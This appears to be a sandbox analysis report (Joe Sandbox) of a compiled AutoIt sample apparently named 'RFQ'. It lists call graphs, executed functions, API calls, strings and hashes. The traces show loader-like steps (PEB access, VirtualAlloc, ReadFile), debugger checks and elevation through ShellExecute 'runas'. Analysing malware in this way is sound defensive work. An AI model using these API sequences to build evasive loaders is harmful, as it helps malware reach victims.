87954 472f47 127 API calls 87945->87954 87946->87932 87947->87945 87948->87779 87949->87784 87950->87945 87951->87945 87952->87945 87953->87945 87954->87945 87955->87932 87956->87932 87957->87944 87958->87928 87959->87799 87960->87802 87961->87814 87962->87820 87963->87807 87964->87822 87965->87848 87966->87854 87967->87822 87968->87828 87969->87822 87970->87828 87971->87842 87972->87828 87973->87840 87974->87828 87975->87828 87976->87834 87978 4289d2 87977->87978 87979 408db3 87977->87979 88007 45e737 90 API calls 3 library calls 87978->88007 88005 40bec0 90 API calls 87979->88005 87982 4289e5 88008 45e737 90 API calls 3 library calls 87982->88008 87984 428a05 87986 408f40 VariantClear 87984->87986 87992 408e5a 87986->87992 87987 40a780 194 API calls 87990 408dc9 87987->87990 87988 408e64 87989 408f40 VariantClear 87988->87989 87989->87992 87990->87982 87990->87984 87990->87987 87990->87988 87991 408f40 VariantClear 87990->87991 87990->87992 88006 40ba10 52 API calls 2 library calls 87990->88006 87991->87990 87992->87860 87994 408f40 VariantClear 87993->87994 87995 403d20 87994->87995 87996 403cd0 VariantClear 87995->87996 87997 403d4d 87996->87997 88009 4755ad 87997->88009 88012 45e17d 87997->88012 88022 46e91c 87997->88022 88025 467897 87997->88025 87998 403d76 87998->87858 87998->87869 88003->87858 88004->87861 88005->87990 88006->87990 88007->87982 88008->87984 88069 475077 88009->88069 88011 4755c0 88011->87998 88013 45e198 88012->88013 88014 45e19c 88013->88014 88015 45e1b8 88013->88015 88016 408f40 VariantClear 88014->88016 88017 45e1cc 88015->88017 88018 45e1db FindClose 88015->88018 88019 45e1a4 88016->88019 88020 45e1d9 moneypunct 88017->88020 88176 44ae3e 88017->88176 88018->88020 88019->87998 88020->87998 88191 46e785 88022->88191 88024 46e92f 88024->87998 88026 4678bb 88025->88026 88054 467954 88026->88054 88276 45340c 85 API calls 88026->88276 88027 4115d7 52 API calls 88029 467989 88027->88029 88031 467995 88029->88031 88280 40da60 53 API calls 88029->88280 88030 4678f6 88032 413a0e __wsplitpath 46 API calls 88030->88032 88034 4533eb 85 API calls 88031->88034 88035 4678fc 88032->88035 88036 4679b7 88034->88036 88037 401b10 52 API calls 88035->88037 88038 40de40 60 API calls 88036->88038 88039 46790c 88037->88039 88040 4679c3 88038->88040 88277 40d200 52 API calls 2 library calls 88039->88277 88042 4679c7 GetLastError 88040->88042 88043 467a05 88040->88043 88045 403cd0 VariantClear 88042->88045 88046 467a2c 88043->88046 88047 467a4b 88043->88047 88044 467917 88044->88054 88278 4339fa GetFileAttributesW FindFirstFileW FindClose 88044->88278 88048 4679dc 88045->88048 88050 4115d7 52 API calls 88046->88050 88051 4115d7 52 API calls 88047->88051 88052 4679e6 88048->88052 88058 44ae3e CloseHandle 88048->88058 88056 467a31 88050->88056 88057 467a49 88051->88057 88060 408f40 VariantClear 88052->88060 88053 467928 88053->88054 88059 46792f 88053->88059 88054->88027 88055 467964 88054->88055 88055->87998 88281 436299 52 API calls 2 library calls 88056->88281 88064 408f40 VariantClear 88057->88064 88058->88052 88279 4335cd 56 API calls 3 library calls 88059->88279 88063 4679ed 88060->88063 88063->87998 88066 467a88 88064->88066 88065 467939 88065->88054 88067 408f40 VariantClear 88065->88067 88066->87998 88068 467947 88067->88068 88068->88054 88122 4533eb 88069->88122 88072 4750ee 88074 408f40 VariantClear 88072->88074 88073 475129 88126 4646e0 88073->88126 88082 4750f5 88074->88082 88076 47515e 88077 475162 88076->88077 88104 47518e 88076->88104 88079 408f40 VariantClear 88077->88079 88078 475357 88080 475365 88078->88080 88081 4754ea 88078->88081 88100 475169 88079->88100 88160 44b3ac 57 API calls 88080->88160 88167 464812 92 API calls 88081->88167 88082->88011 88086 475374 88139 430d31 88086->88139 88087 4754fc 88087->88086 88088 475508 88087->88088 88090 408f40 VariantClear 88088->88090 88089 4533eb 85 API calls 88089->88104 88092 47550f 88090->88092 88092->88100 88093 475388 88146 4577e9 88093->88146 88096 47539e 88154 410cfc 88096->88154 88097 475480 88098 408f40 VariantClear 88097->88098 88098->88100 88100->88011 88102 4753d4 88162 40e830 53 API calls 88102->88162 88103 4753b8 88161 45e737 90 API calls 3 library calls 88103->88161 88104->88078 88104->88089 88104->88097 88109 4754b5 88104->88109 88158 436299 52 API calls 2 library calls 88104->88158 88159 463ad5 64 API calls __wcsicoll 88104->88159 88107 4753c5 GetCurrentProcess TerminateProcess 88107->88102 88108 4753e3 88120 475406 88108->88120 88163 40cf00 53 API calls 88108->88163 88110 408f40 VariantClear 88109->88110 88110->88100 88112 475556 88112->88100 88116 47556e FreeLibrary 88112->88116 88113 4753f8 88164 46c43e 106 API calls 2 library calls 88113->88164 88116->88100 88120->88112 88121 408f40 VariantClear 88120->88121 88165 40cf00 53 API calls 88120->88165 88166 408e80 VariantClear 88120->88166 88168 44b3ac 57 API calls 88120->88168 88169 46c43e 106 API calls 2 library calls 88120->88169 88121->88120 88123 453404 88122->88123 88124 4533f8 88122->88124 88123->88072 88123->88073 88124->88123 88170 4531b1 85 API calls 5 library calls 88124->88170 88171 4536f7 53 API calls 88126->88171 88128 4646fc 88172 4426cd 59 API calls _wcslen 88128->88172 88130 464711 88132 40bc70 52 API calls 88130->88132 88138 46474b 88130->88138 88133 46472c 88132->88133 88173 461465 52 API calls _memmove 88133->88173 88135 464793 88135->88076 88136 464741 88137 40c600 52 API calls 88136->88137 88137->88138 88138->88135 88174 463ad5 64 API calls __wcsicoll 88138->88174 88140 430db2 88139->88140 88141 430d54 88139->88141 88140->88093 88142 4115d7 52 API calls 88141->88142 88143 430d74 88142->88143 88144 430da9 88143->88144 88145 4115d7 52 API calls 88143->88145 88144->88093 88145->88143 88147 457a84 88146->88147 88150 45780c _strcat moneypunct _wcslen _wcscpy 88146->88150 88147->88096 88148 443006 57 API calls 88148->88150 88150->88147 88150->88148 88151 4135bb 46 API calls _malloc 88150->88151 88152 45340c 85 API calls 88150->88152 88153 40f6f0 54 API calls 88150->88153 88175 44b3ac 57 API calls 88150->88175 88151->88150 88152->88150 88153->88150 88156 410d11 88154->88156 88155 410da9 VirtualProtect 88157 410d77 88155->88157 88156->88155 88156->88157 88157->88102 88157->88103 88158->88104 88159->88104 88160->88086 88161->88107 88162->88108 88163->88113 88164->88120 88165->88120 88166->88120 88167->88087 88168->88120 88169->88120 88170->88123 88171->88128 88172->88130 88173->88136 88174->88135 88175->88150 88177 44ae4b moneypunct 88176->88177 88179 443fdf 88176->88179 88177->88020 88184 40da20 88179->88184 88181 443feb 88188 4340db 88181->88188 88183 444001 88183->88177 88185 40da37 88184->88185 88186 40da29 88184->88186 88185->88186 88187 40da3c CloseHandle 88185->88187 88186->88181 88187->88181 88189 40da20 CloseHandle 88188->88189 88190 4340e7 moneypunct 88189->88190 88190->88183 88192 46e7a2 88191->88192 88193 4115d7 52 API calls 88192->88193 88196 46e802 88192->88196 88194 46e7ad 88193->88194 88195 46e7b9 88194->88195 88239 40da60 53 API calls 88194->88239 88201 4533eb 85 API calls 88195->88201 88197 46e7e5 88196->88197 88204 46e82f 88196->88204 88198 408f40 VariantClear 88197->88198 88200 46e7ea 88198->88200 88200->88024 88202 46e7ca 88201->88202 88240 40de40 88202->88240 88203 46e8b5 88232 4680ed 88203->88232 88204->88203 88207 46e845 88204->88207 88209 4533eb 85 API calls 88207->88209 88217 46e84b 88209->88217 88210 46e8bb 88236 443fbe 88210->88236 88211 46e7db 88211->88197 88213 44ae3e CloseHandle 88211->88213 88212 46e87a 88252 4689f4 59 API calls 88212->88252 88213->88197 88216 46e883 88253 4013c0 52 API calls 88216->88253 88217->88212 88217->88216 88220 46e88f 88222 40e0a0 52 API calls 88220->88222 88221 408f40 VariantClear 88230 46e881 88221->88230 88223 46e899 88222->88223 88254 40d200 52 API calls 2 library calls 88223->88254 88224 46e911 88224->88024 88226 40da20 CloseHandle 88228 46e903 88226->88228 88227 46e8a5 88255 4689f4 59 API calls 88227->88255 88231 44ae3e CloseHandle 88228->88231 88230->88224 88230->88226 88231->88224 88233 468100 88232->88233 88234 4680fa 88232->88234 88233->88210 88256 467ac4 55 API calls 2 library calls 88234->88256 88257 443e36 88236->88257 88238 443fd3 88238->88221 88238->88230 88239->88195 88241 40da20 CloseHandle 88240->88241 88242 40de4e 88241->88242 88264 40f110 88242->88264 88245 4264fa 88247 40de84 88273 40e080 SetFilePointerEx SetFilePointerEx 88247->88273 88249 40de8b 88274 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88249->88274 88251 40de90 88251->88204 88251->88211 88252->88230 88253->88220 88254->88227 88255->88230 88256->88233 88260 443e19 88257->88260 88261 443e26 88260->88261 88262 443e32 WriteFile 88260->88262 88263 443db4 SetFilePointerEx SetFilePointerEx 88261->88263 88262->88238 88263->88262 88265 40f125 CreateFileW 88264->88265 88266 42630c 88264->88266 88267 40de74 88265->88267 88266->88267 88268 426311 CreateFileW 88266->88268 88267->88245 88272 40dea0 55 API calls moneypunct 88267->88272 88268->88267 88269 426337 88268->88269 88275 40df90 SetFilePointerEx SetFilePointerEx 88269->88275 88271 426342 88271->88267 88272->88247 88273->88249 88274->88251 88275->88271 88276->88030 88277->88044 88278->88053 88279->88065 88280->88031 88281->88057 88282 42d154 88286 480a8d 88282->88286 88284 42d161 88285 480a8d 194 API calls 88284->88285 88285->88284 88287 480ae4 88286->88287 88288 480b26 88286->88288 88290 480aeb 88287->88290 88291 480b15 88287->88291 88289 40bc70 52 API calls 88288->88289 88300 480b2e 88289->88300 88292 480aee 88290->88292 88293 480b04 88290->88293 88319 4805bf 194 API calls 88291->88319 88292->88288 88295 480af3 88292->88295 88318 47fea2 194 API calls __itow_s 88293->88318 88317 47f135 194 API calls 88295->88317 88297 40e0a0 52 API calls 88297->88300 88299 408f40 VariantClear 88302 481156 88299->88302 88300->88297 88303 480aff 88300->88303 88306 40e710 53 API calls 88300->88306 88307 401980 53 API calls 88300->88307 88309 40c2c0 52 API calls 88300->88309 88310 408e80 VariantClear 88300->88310 88311 480ff5 88300->88311 88312 40a780 194 API calls 88300->88312 88320 45377f 52 API calls 88300->88320 88321 45e951 53 API calls 88300->88321 88322 40e830 53 API calls 88300->88322 88323 47925f 53 API calls 88300->88323 88324 47fcff 194 API calls 88300->88324 88304 408f40 VariantClear 88302->88304 88303->88299 88305 48115e 88304->88305 88305->88284 88306->88300 88307->88300 88309->88300 88310->88300 88325 45e737 90 API calls 3 library calls 88311->88325 88312->88300 88317->88303 88318->88303 88319->88303 88320->88300 88321->88300 88322->88300 88323->88300 88324->88300 88325->88303 88326 425b2b 88331 40f000 88326->88331 88330 425b3a 88332 4115d7 52 API calls 88331->88332 88333 40f007 88332->88333 88334 4276ea 88333->88334 88340 40f030 88333->88340 88339 41130a 51 API calls __cinit 88339->88330 88341 40f039 88340->88341 88342 40f01a 88340->88342 88370 41130a 51 API calls __cinit 88341->88370 88344 40e500 88342->88344 88345 40bc70 52 API calls 88344->88345 88346 40e515 GetVersionExW 88345->88346 88347 402160 52 API calls 88346->88347 88348 40e557 88347->88348 88371 40e660 88348->88371 88355 427674 88358 4276c6 GetSystemInfo 88355->88358 88356 40e5e0 88359 4276d5 GetSystemInfo 88356->88359 88385 40efd0 88356->88385 88357 40e5cd GetCurrentProcess 88392 40ef20 LoadLibraryA GetProcAddress 88357->88392 88358->88359 88363 40e629 88389 40ef90 88363->88389 88366 40e641 FreeLibrary 88367 40e644 88366->88367 88368 40e653 FreeLibrary 88367->88368 88369 40e656 88367->88369 88368->88369 88369->88339 88370->88342 88372 40e667 88371->88372 88373 42761d 88372->88373 88374 40c600 52 API calls 88372->88374 88375 40e55c 88374->88375 88376 40e680 88375->88376 88377 40e687 88376->88377 88378 427616 88377->88378 88379 40c600 52 API calls 88377->88379 88380 40e566 88379->88380 88380->88355 88381 40ef60 88380->88381 88382 40e5c8 88381->88382 88383 40ef66 LoadLibraryA 88381->88383 88382->88356 88382->88357 88383->88382 88384 40ef77 GetProcAddress 88383->88384 88384->88382 88386 40e620 88385->88386 88387 40efd6 LoadLibraryA 88385->88387 88386->88358 88386->88363 88387->88386 88388 40efe7 GetProcAddress 88387->88388 88388->88386 88393 40efb0 LoadLibraryA GetProcAddress 88389->88393 88391 40e632 GetNativeSystemInfo 88391->88366 88391->88367 88392->88356 88393->88391 88394 40323f8 88395 4030048 GetPEB 88394->88395 88396 40324f3 88395->88396 88408 40322e8 88396->88408 88398 403251c CreateFileW 88400 4032573 88398->88400 88401 403256e 88398->88401 88400->88401 88402 403258a VirtualAlloc 88400->88402 88402->88401 88403 40325a8 ReadFile 88402->88403 88403->88401 88404 40325c3 88403->88404 88405 40312e8 13 API calls 88404->88405 88407 40325f6 88405->88407 88406 4032619 ExitProcess 88406->88401 88407->88406 88409 40322f1 Sleep 88408->88409 88410 40322ff 88409->88410 88411 425b5e 88416 40c7f0 88411->88416 88415 425b6d 88451 40db10 52 API calls 88416->88451 88418 40c82a 88452 410ab0 6 API calls 88418->88452 88420 40c86d 88421 40bc70 52 API calls 88420->88421 88422 40c877 88421->88422 88423 40bc70 52 API calls 88422->88423 88424 40c881 88423->88424 88425 40bc70 52 API calls 88424->88425 88426 40c88b 88425->88426 88427 40bc70 52 API calls 88426->88427 88428 40c8d1 88427->88428 88429 40bc70 52 API calls 88428->88429 88430 40c991 88429->88430 88453 40d2c0 52 API calls 88430->88453 88432 40c99b 88454 40d0d0 53 API calls 88432->88454 88434 40c9c1 88435 40bc70 52 API calls 88434->88435 88436 40c9cb 88435->88436 88455 40e310 53 API calls 88436->88455 88438 40ca28 88439 408f40 VariantClear 88438->88439 88440 40ca30 88439->88440 88441 408f40 VariantClear 88440->88441 88442 40ca38 GetStdHandle 88441->88442 88443 429630 88442->88443 88444 40ca87 88442->88444 88443->88444 88445 429639 88443->88445 88450 41130a 51 API calls __cinit 88444->88450 88456 4432c0 57 API calls 88445->88456 88447 429641 88457 44b6ab CreateThread 88447->88457 88449 42964f CloseHandle 88449->88444 88450->88415 88451->88418 88452->88420 88453->88432 88454->88434 88455->88438 88456->88447 88457->88449 88458 44b5cb 58 API calls 88457->88458 88459 425b6f 88464 40dc90 88459->88464 88463 425b7e 88465 40bc70 52 API calls 88464->88465 88466 40dd03 88465->88466 88473 40f210 88466->88473 88468 426a97 88470 40dd96 88470->88468 88471 40ddb7 88470->88471 88476 40dc00 52 API calls 2 library calls 88470->88476 88472 41130a 51 API calls __cinit 88471->88472 88472->88463 88477 40f250 RegOpenKeyExW 88473->88477 88475 40f230 88475->88470 88476->88470 88478 425e17 88477->88478 88479 40f275 RegQueryValueExW 88477->88479 88478->88475 88480 40f2c3 RegCloseKey 88479->88480 88481 40f298 88479->88481 88480->88475 88482 40f2a9 RegCloseKey 88481->88482 88483 425e1d 88481->88483 88482->88475

                                                                          Executed Functions

                                                                          Function 0040D590 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                                                            • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                                                            • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                                                          • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                                                          • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                                                            • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                                                          • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                                                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                                                          • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                                                            • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                            • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                            • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                            • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                            • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                          Strings
                                                                          • runas, xrefs: 0042E2AD, 0042E2DC
                                                                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                          • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                          • API String ID: 2495805114-3383388033
                                                                          • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                          • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                          • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                          • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D
                                                                          Function 0040E500 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 157COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1004 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1013 40e582-40e583 1004->1013 1014 427674-427679 1004->1014 1017 40e585-40e596 1013->1017 1018 40e5ba-40e5cb call 40ef60 1013->1018 1015 427683-427686 1014->1015 1016 42767b-427681 1014->1016 1020 427693-427696 1015->1020 1021 427688-427691 1015->1021 1019 4276b4-4276be 1016->1019 1022 427625-427629 1017->1022 1023 40e59c-40e59f 1017->1023 1036 40e5ec-40e60c 1018->1036 1037 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1018->1037 1038 4276c6-4276ca GetSystemInfo 1019->1038 1020->1019 1027 427698-4276a8 1020->1027 1021->1019 1029 427636-427640 1022->1029 1030 42762b-427631 1022->1030 1025 40e5a5-40e5ae 1023->1025 1026 427654-427657 1023->1026 1032 40e5b4 1025->1032 1033 427645-42764f 1025->1033 1026->1018 1031 42765d-42766f 1026->1031 1034 4276b0 1027->1034 1035 4276aa-4276ae 1027->1035 1029->1018 1030->1018 1031->1018 1032->1018 1033->1018 1034->1019 1035->1019 1039 40e612-40e623 call 40efd0 1036->1039 1040 4276d5-4276df GetSystemInfo 1036->1040 1037->1036 1048 40e5e8 1037->1048 1038->1040 1039->1038 1045 40e629-40e63f call 40ef90 GetNativeSystemInfo 1039->1045 1050 40e641-40e642 FreeLibrary 1045->1050 1051 40e644-40e651 1045->1051 1048->1036 1050->1051 1052 40e653-40e654 FreeLibrary 1051->1052 1053 40e656-40e65d 1051->1053 1052->1053
                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                          • String ID: 0SH
                                                                          • API String ID: 3363477735-851180471
                                                                          • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                          • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                          • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                          • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                          Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: IsThemeActive$uxtheme.dll
                                                                          • API String ID: 2574300362-3542929980
                                                                          • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                          • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                          • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                          • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                          Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                          • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                          • TranslateMessage.USER32(?), ref: 00409556
                                                                          • DispatchMessageW.USER32(?), ref: 00409561
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Peek$DispatchSleepTranslate
                                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                          • API String ID: 1762048999-758534266
                                                                          • Opcode ID: 230208aa29ab6d04e6d17a77ab66c18202fa9fbe0bb8c521ee9ec5454df47b9a
                                                                          • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                          • Opcode Fuzzy Hash: 230208aa29ab6d04e6d17a77ab66c18202fa9fbe0bb8c521ee9ec5454df47b9a
                                                                          • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                          Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • __wcsicoll.LIBCMT ref: 00402007
                                                                          • __wcsicoll.LIBCMT ref: 0040201D
                                                                          • __wcsicoll.LIBCMT ref: 00402033
                                                                            • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                          • __wcsicoll.LIBCMT ref: 00402049
                                                                          • _wcscpy.LIBCMT ref: 0040207C
                                                                          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
